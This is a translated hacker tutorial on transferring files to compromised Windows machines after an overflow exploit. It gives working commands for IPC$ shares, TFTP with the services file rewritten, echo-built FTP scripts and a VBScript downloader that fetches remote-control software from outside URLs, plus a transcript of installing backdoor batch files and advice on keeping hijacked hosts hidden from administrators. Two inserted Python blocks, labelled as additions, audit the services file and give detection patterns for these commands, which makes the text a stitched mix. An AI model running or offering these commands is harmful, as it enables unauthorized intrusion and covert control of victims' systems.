1. First, the beginners' favorite: IPC$ sharing. Usage is simple. First create an account in the overflow shell, then connect to the broiler (the compromised host) from a local CMD prompt. The commands are as follows:

    net use \\IP\shared-directory$ "password" /user:"username"
    copy C:\file \\IP\shared-directory$

(The shared directory name is followed by $.) Taking this further: have you thought that we can also have the broiler connect to our own machine? The purpose, transferring the file, is the same; the upload simply becomes a download. The second command changes to:

    copy \\your-IP\shared-directory\file C:\file
Everyone can experiment along these lines. Those who have played with MS03-049 know that this overflow needs ports 139 and 445, so wherever the overflow succeeds, the share can also be mapped to a local drive, and the rest is easy. The command is as follows:

    net use Z: \\IP\shared-directory

If the other side has turned off the default shares, you can turn them on again with the net share command in the overflow shell. Remember to disconnect after transferring the file. The command:

    net use Z: \\IP\shared-directory /del
2. Next, TFTP, which many of you have used. First you need a public IP address. Then download TFTPD32.exe and run it in the directory that holds the file you want to transfer. Then run this command in the overflow shell:

    tftp -i your-IP get XX.exe

This completes the file transfer. When an administrator restricts file transfers, port 69 is usually simply blocked; in that case, change the default port 69. TFTP servers such as TFTPD32.exe let you set the port yourself. I won't go into it here; just restart the TFTP server after changing the setting. As for the client:
There is a services file in the system32\drivers\etc\ folder. Opened, it looks like this:

    # Copyright (c) 1993-1999 Microsoft Corp.
    #
    # This file contains port numbers for well-known services defined by IANA
    #
    # Format:
    #
    #
    echo                7/tcp
    echo                7/udp
    discard             9/tcp    sink null
    discard             9/udp    sink null
    systat             11/tcp    users                  #Active users
    systat             11/tcp    users                  #Active users
    ...
    tftp               69/udp                           #Trivial file transfer
    ...

It is easy to see that the 69/udp line defines the default TFTP port, and that the protocol is UDP. Concretely, these two commands are all that is needed, which is only one command more than before:

    echo tftp 8300/udp > %systemroot%\system32\drivers\etc\services
    tftp -i xxx.xxx.xxx.xxx get Srv.exe

Note: set the TFTP server port to the same value as the custom port, here 8300. A safer variant:

    ren %systemroot%\system32\drivers\etc\services 1
    echo tftp 8300/udp > 2
    copy 2 %systemroot%\system32\drivers\etc\services
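The services-file change described above leaves an artifact a defender can check for: the overwriting `echo ... >` reduces the file to a single line, and either variant leaves a tftp entry that is not 69/udp. The following audit is an added example, not part of the original article; the function names and the baseline (taken from the excerpt above) are assumptions, and the sample file contents are constructed.

```python
import re

# Minimal baseline: the entries visible in the page's excerpt of the stock file.
BASELINE = {("echo", "tcp"): 7, ("echo", "udp"): 7, ("discard", "tcp"): 9,
            ("discard", "udp"): 9, ("tftp", "udp"): 69}
ENTRY = re.compile(r"^\s*([\w.+-]+)\s+(\d+)/(\w+)")

def parse_services(text):
    """Return {(name, proto): [ports]} for every non-comment entry."""
    seen = {}
    for line in text.splitlines():
        m = ENTRY.match(line.split("#", 1)[0])
        if m:
            key = (m.group(1).lower(), m.group(3).lower())
            seen.setdefault(key, []).append(int(m.group(2)))
    return seen

def audit_services(text):
    """Flag baseline entries that are missing or mapped to another port."""
    seen, findings = parse_services(text), []
    for (name, proto), expected in BASELINE.items():
        ports = seen.get((name, proto))
        if ports is None:
            findings.append(f"{name}/{proto}: missing (file truncated or replaced)")
        elif set(ports) != {expected}:
            findings.append(f"{name}/{proto}: port {sorted(set(ports))}, expected {expected}")
    return findings

# Constructed samples: a stock excerpt, the file after an overwriting
# "echo ... >", and the file after an appending "echo ... >>".
STOCK = """\
# Copyright (c) 1993-1999 Microsoft Corp.
echo                7/tcp
echo                7/udp
discard             9/tcp    sink null
discard             9/udp    sink null
systat             11/tcp    users                  #Active users
tftp               69/udp                           #Trivial file transfer
"""
OVERWRITTEN = "tftp 8300/udp \n"
APPENDED = STOCK + "tftp 8300/udp \n"
```

On a live host the input would be the contents of %systemroot%\system32\drivers\etc\services, compared against a baseline taken from a known-good image.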
Of course, this method does not succeed every time; firewalls and the administrator's anti-hacking settings can make the file transfer fail. So don't get stuck on one approach. As the saying goes, all roads lead to Rome.

3. Next, FTP, which anyone who plays with overflows has to know. If you run the ftp command in the overflow shell and connect to a server, it stalls at the point where the user name is entered, apparently hung. So people usually enable the Telnet service on the broiler and, after connecting over Telnet, connect to the FTP server to transfer files. Or they write a script on the broiler, with commands as follows:

    echo ftp > 1.txt
    echo open xxx.xxx.xxx.xxx > 1.txt
    echo user >> 1.txt
    echo pass >> 1.txt
    echo bin >> 1.txt
    echo get Aoqi.rar >> 1.txt
    echo bye >> 1.txt
    ftp -s:1.txt

Running ftp -s:1.txt performs the download.
FTP with a custom port. A custom FTP port is actually very simple: put a space after the IP address and follow it with the custom port, as follows:

    echo open xxx.xxx.xxx.xxx 2121> ftp.txt
    echo user >> ftp.txt
    echo password >> ftp.txt
    echo bin >> ftp.txt    [optional]
    echo get aoqi.rar >> ftp.txt
    echo bye >> ftp.txt
    ftp -s:ftp.txt

Here the custom port is 2121; it only has to match the port the FTP server is set to.
Now, how to transfer files with FTP directly in the overflow shell, without a script. I know of two ways. One is to set your FTP server to anonymous access, so that you can log in to the server and download directly. The other is to set your FTP account's password to empty, but an FTP server set up this way is at risk; remember to set the permissions to download only, or change the FTP port. You can then download as follows:

    C:\WINNT\system32>ftp
    ftp
    open XXX.kmip.net
    User (Danne.kmip.net:(none)): 1
    bin
    get 2.exe
    bye
    C:\WINNT\system32>aoqi.exe    // aoqi.exe is a self-extracting archive
    2.exe

    C:\WINNT\system32>dir 1.bat    // 1.bat is the backdoor auto-install batch file
    dir 1.bat
     Volume in drive C has no label.
     Volume Serial Number is 1001-8227

     Directory of C:\WINNT\system32

    File Not Found    // I don't know why the file can't be found the first time

    C:\WINNT\system32>dir 2.bat    // 2.bat is the Radmin auto-install batch file
    dir 2.bat
     Volume in drive C has no label.
     Volume Serial Number is 1001-8227

     Directory of C:\WINNT\system32

    2004-05-01  13:04                85 2.bat
                   1 File(s)             85 bytes
                   0 Dir(s)   4,735,807,488 bytes free
This has a 99% success rate, and I have always used it ~ Recommended. You only need to set up an FTP server, which can sit on your own machine or on a broiler; we should make full use of broilers (a side note: broilers should be maintained regularly and looked after diligently, so that they are not taken over by others or found by the administrator) ~ If you don't have an FTP server, I can provide one.
4. Writing a download script works very well; it is just a matter of saving the source code to a file. So in the shell, write it directly to a file with echo statements, then execute it with the corresponding interpreter. Here is a simplified example:

    echo Set xPost = CreateObject("Microsoft.XMLHTTP") > iget.vbe
    echo xPost.Open "GET","http://softworks.512j.com/radmin.exe",0 >> iget.vbe
    echo xPost.Send() >> iget.vbe
    echo Set sGet = CreateObject("ADODB.Stream") >> iget.vbe
    echo sGet.Mode = 3 >> iget.vbe
    echo sGet.Type = 1 >> iget.vbe
    echo sGet.Open() >> iget.vbe
    echo sGet.Write(xPost.responseBody) >> iget.vbe
    echo sGet.SaveToFile "radmin.exe",2 >> iget.vbe

Then run cscript 167168.vbs. Change http://167168.meibu.com/srv.exe to the web path where you put your file; Srv.exe can be changed to the path where the file should be saved.

5. start its:http://167168.meibu.com/ca.rar (look closely; beware of the tab)

    cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"

(This assumes the system is installed on drive C and the current environment is SYSTEM. In a user environment, change Default User to the user name.)

    dir /s ca[1].rar

This displays the location of ca[1].rar, such as C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\0QMVC11H\ca[1].rar. Finally:

    copy 0QMVC11H\ca[1].rar C:\WINNT\system32\ca.rar
    del 0QMVC11H\ca[1].rar
To summarize, these are five conventional methods; in fact there are also some unconventional ones, for example connecting with the DameWare remote control tool and using its file transfer function. I won't go into them here ~ In general, I believe transferring files should not be a problem. If you have other methods, you can also share them at http://167168.kmip.net.
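Each of the five methods above leaves a recognizable command line, so they can be matched in process-creation logs; the stronger signal is a file assembled with echo redirects and then handed to ftp -s: or cscript. The matcher below is an added example, not part of the original article; the rule names and the `scan` function are assumptions, and the sample session is constructed with a documentation-range address.

```python
import re

# Patterns for the transfer commands this page describes (command-line text only).
RULES = [
    ("unc-net-use", re.compile(r"\bnet(?:\.exe)?\s+use\b.*\\\\[\w.-]+\\", re.I)),
    ("tftp-get", re.compile(r"\btftp(?:\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("services-file-write", re.compile(r"\becho\b.*>.*\\drivers\\etc\\services\s*$", re.I)),
    ("its-handler-fetch", re.compile(r"\bstart\s+its:\s*https?://", re.I)),
]
# An echo redirect that creates or appends to a file, and the two interpreters
# the page feeds such files to: ftp -s:FILE and cscript FILE (options skipped).
ECHO_WRITE = re.compile(r"\becho\b.*?>{1,2}\s*(\S+)\s*$", re.I)
RUN_FILE = re.compile(
    r"\b(?:ftp(?:\.exe)?\s+-s:\s*|[cw]script(?:\.exe)?\s+(?://\S+\s+)*)(\S+)", re.I)

def scan(cmdlines):
    """Return [(line_no, rule)] for one shell session's command lines, in order."""
    hits, echo_built = [], set()
    for no, cmd in enumerate(cmdlines, 1):
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((no, name))
        w = ECHO_WRITE.search(cmd)
        if w:
            echo_built.add(w.group(1).lower())
        r = RUN_FILE.search(cmd)
        if r:
            # Higher confidence when the file was built by echo in this session.
            built = r.group(1).lower() in echo_built
            hits.append((no, "echo-built-script-run" if built else "script-file-run"))
    return hits

# Constructed sample session; 192.0.2.10 is a documentation-range placeholder.
SAMPLE = [
    r"cmd /c echo open 192.0.2.10 2121> ftp.txt",
    r"cmd /c echo get tool.rar >> ftp.txt",
    r"cmd /c ftp -s:ftp.txt",
    r"cmd /c echo tftp 8300/udp > C:\WINNT\system32\drivers\etc\services",
    r"tftp -i 192.0.2.10 get tool.exe",
    r"net use Z: \\192.0.2.10\share$",
    r"cmd /c dir C:\WINNT\system32",
    r"cscript //nologo C:\scripts\inventory.vbs",
]
```

The last sample line is an ordinary administrative script run; it is reported only under the lower-confidence `script-file-run` label because no echo redirect created that file in the session.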
########################################
iget.vbe script code:

    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "GET","http://softworks.512j.com/radmin.exe",0
    xPost.Send()
    Set sGet = CreateObject("ADODB.Stream")
    sGet.Mode = 3        ' read/write
    sGet.Type = 1        ' binary
    sGet.Open()
    sGet.Write(xPost.responseBody)
    sGet.SaveToFile "radmin.exe",2        ' 2 = overwrite an existing file

########################################

    iLocal = LCase(WScript.Arguments(1))        ' second argument: local path to save to
    iRemote = LCase(WScript.Arguments(0))        ' first argument: URL to fetch
    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "GET",iRemote,0
    xPost.Send()
    Set sGet = CreateObject("ADODB.Stream")
    sGet.Mode = 3
    sGet.Type = 1
    sGet.Open()
    sGet.Write(xPost.responseBody)
    sGet.SaveToFile iLocal,2